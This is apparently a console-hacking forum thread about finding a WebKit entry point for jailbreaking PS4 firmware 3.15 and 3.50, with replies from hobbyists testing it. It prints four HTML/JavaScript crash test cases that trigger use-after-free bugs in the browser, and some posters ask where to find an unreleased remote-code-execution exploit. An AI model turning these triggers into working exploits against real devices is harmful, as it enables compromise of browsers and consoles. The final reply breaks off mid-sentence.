PS4 3.15 Firmware Entry Point for Testing from Zecoxao

Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.

• http://2.83.228.148/totally_not_gachimuchi/

@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers
1. Entry point:

<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>

2. Entry point:

<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>

Also the the source code from the Webkit from Sony

• EDIT / Update by B7U3 C50SS & source files from zecoxao & and a file server for accessing the PS4 Tests page - via, pasha4ur:
• You may also crash test your PS4 browser ATM on any FW from zecoxao's Github Page.

3. Entry Point:

<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
><object onbeforeload="eventhandler2()"><iframe>

4. Entry Point:

<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>

 

[GritNGrind]

@CnCore I've Seen a video on YouTube i can link you. ^_^

I can get the Pass without crash on mine as well on 3.50FW and the one with a dialog alert box too, but I can't get an exploit to run with either of them. This is at least a good sign we can run it, and is probably a good starter entry point. It's just needing some know how to run this use after free vulnerability to exploit it further. I'm going to keep trying a few other things, but it will probably be Thursday night before I can look at it again.

Here's a couple of good articles on use after free vulnerability if you want to take a look.

https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf

https://securityintelligence.com/use-after-frees-that-pointer-may-be-pointing-to-something-bad/

Wish someone knew something about this code...says exploit was never released to the public.
http://www.securityfocus.com/bid/66243/info

 

[B7U3 C50SS]

jut googled: WebKit Use-After-Free Remote Code Execution Vulnerability - someone knows a secret place where to grab it or has it please speak up. I wonder if @sEKTOR do you know anything about this of stuff. you seem to.

 

[SorenAlke]

this is a cve from 2014
it exploits a dangling pointer after the object the has been referrenced

instead of derefferencing the variable where the object is held it frees memory of what was allocated to the heap before the trace happens
-the stack trace of when the object was freed can also be dumped via the “!heap -p” command in WinDbg

this is a memory corruption bug in freebsd as well

 

[mcmrc1]

some more tests on 3.50 needed

easy< method -> http://darkair.de/zecoxao.html

http://zecoxao.github.io/

 

[Jeff]

Tencent Security Team Sniper was able to demonstrate a successful code execution attack against Safari to gain root privileges using a use-after-free vulnerability in Safari and an out-of-bounds vulnerability in Mac OS X.

http://venturebeat.com/2016/03/18/pwn2own-2016-chrome-edge-and-safari-hacked-460k-awarded-in-total/

 

[yourfakers]

some more tests on 3.50 needed

easy< method -> [LINKS]

Got "no memory available" in 3.50. Is this what we want to see? Or is it bad news? I mean... When you get this message does it mean that it is something to look at?

Edit: BTW I'd like to thank all the scene's members who make things like this happen. It doesn't matter we don't get anything functional, you've already made an effort and a time (and money) investment to give us hope in the scene development. I really hope you get what you deserve[joke], which is a lot of sexy chicks knocking at your door praying for savage sex.[/joke]
Greetings!

 

[mcmrc1]

i think they want to crash the system or the browser to start a attack then...

 

[yourfakers]

@SorenAlke said four pages back that it should say what I got. Sorry for the question, need to read before posting. So I think it crashes, then gives you that warning "no memory left"/"no memory available" (don't know exactly what the warning should say in english because I have mine in spanish, holy synonyms), then the developer fu*ks the system!

 

[Blade]

Got "no memory available" in 3.50. Is this what we want to see? Or is it bad news? I mean... When you get this message does it mean that it is something to look at?

This is exactly what you want. Because of the "no memory available" you can crash it in the first place.
There are plenty of exploits released for multiple platforms on https://www.exploit-db.com/

But to disappoint you, all this is not very useful for the end-user - yet.
As the Title says its 'just' an "entry point for testing". So for devs its awesome
Although I think that most devs are still on 1.76

 

[yourfakers]

This is exactly what you want. Because of the "no memory available" you can crash it in the first place.
There are plenty of exploits released for multiple platforms on https://www.exploit-db.com/

But to disappoint you, all this is not very useful for the end-user - yet.
As the Title says its 'just' an "entry point for testing". So for devs its awesome
Although I think that most devs are still on 1.76

Well, glad to contribute. I don't mind this is not very useful to the user, I think this helps everyone who wants to develop something and are doubting to get into the scene, it's like "hey! whatch what this scener did, let's try to replicate its results!". This is lik